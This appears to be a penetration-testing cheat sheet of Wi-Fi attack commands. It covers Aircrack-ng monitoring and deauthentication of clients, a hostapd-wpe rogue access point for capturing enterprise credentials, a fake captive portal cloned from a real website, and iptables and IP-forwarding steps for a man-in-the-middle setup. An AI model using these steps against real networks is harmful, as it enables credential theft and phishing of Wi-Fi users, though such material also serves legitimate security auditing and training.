This section lists common commands used for Wi-Fi network analysis, security auditing, and setting up advanced network configurations like enterprise-level authentication and captive portals.
Normal Wi-Fi Network Analysis (Using Aircrack-ng Suite)
| Command | Description |
iwconfig | Displays wireless network interface information and configuration (similar to ifconfigbut for wireless). |
airmon-ng start wlan1 | Puts the specified wireless interface (wlan1) into monitor mode to capture network traffic. The new monitor interface (often wlan1mon) will be created. |
airodump-ng wlan1 | Starts capturing wireless traffic and displays a list of visible access points (APs) and connected clients. Note: You should use the monitor interface (e.g., wlan1mon) created in the previous step. |
airodump-ng wlan1 --bssid 00:08:A1:DC:BA:D3 -c 6 -w berkan | Focuses the capture on a specific Access Point (AP) identified by its BSSID (00:08:A1:DC:BA:D3), operating on channel 6 (-c 6), and saves the captured data to files prefixed with berkan (-w berkan). |
aireplay-ng --deauth 10 -a 00:08:A1:DC:BA:D3 -c FE:ED:0F:55:67:18 | Sends deauthentication packets to the client with MAC address FE:ED:0F:55:67:18from the AP with MAC address 00:08:A1:DC:BA:D3. The number 10 specifies the number of packets to send. This is often used to capture the handshake. |
Enterprise Wi-Fi (WPA-EAP/WPA2-EAP) – Hostapd-wpe Setup
These commands are typically used to set up a Rogue AP (Access Point) for capturing Enterprise (802.1x) credentials using a tool like hostapd-wpe.
| Command | Description |
service NetworkManager stop | Stops the NetworkManager service to prevent it from interfering with manual network configuration or tools like hostapd. |
nano /etc/hostapd-wpe/hostapd-wpe.conf | Opens the hostapd-wpe configuration file for editing, where the Rogue AP’s parameters (SSID, channel, EAP settings, etc.) are defined. |
hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf | Starts the rogue Access Point using the custom configuration file. |
Captive Portal Setup (Simple HTTP/Web Server Scenario)
These commands outline a basic setup for creating a fake Wi-Fi login page (Captive Portal) using an Apache web server.
| Command | Description |
wget --mirror --convert-links https://www.beyaz.net/ | Downloads (mirrors) the entire content of the specified website (https://www.beyaz.net/) and adjusts all internal links to work locally. |
mv * /var/www/html | Moves all downloaded files into the Apache web server’s default root directory (/var/www/html), making them accessible via the web server. |
service apache2 start | Starts the Apache web server to host the copied website (the fake Captive Portal). |
DNS Masquerading and IP Forwarding (Network Setup)
These steps configure the network interface and enable IP forwarding, which is essential for routing traffic in a man-in-the-middle (MITM) scenario, such as a Captive Portal or DNS Spoofing attack.
| Command | Description |
nano /proc/sys/net/ipv4/ip_forward | Opens the IP forwarding configuration file. The content inside this file must be set to 1 to enable IP forwarding (allowing packets to pass between interfaces). |
iptables --flush | Flushes (deletes) all rules from all chains in the filter table. |
iptables --table nat --flush | Flushes (deletes) all rules from all chains in the nat (Network Address Translation) table. |
iptables --delete-chain | Deletes all non-default chains in the filter table. |
iptables --table nat --delete-chain | Deletes all non-default chains in the nat table. |
iptables -P FORWARD ACCEPT | Sets the default policy for the FORWARD chain to ACCEPT, allowing packets to be forwarded between interfaces by default. |
ifconfig wlan0 10.0.0.1 netmask 255.255.255.0 | Assigns a static IP address (10.0.0.1) and subnet mask to the wireless interface (wlan0), setting it up as the gateway for the rogue network. |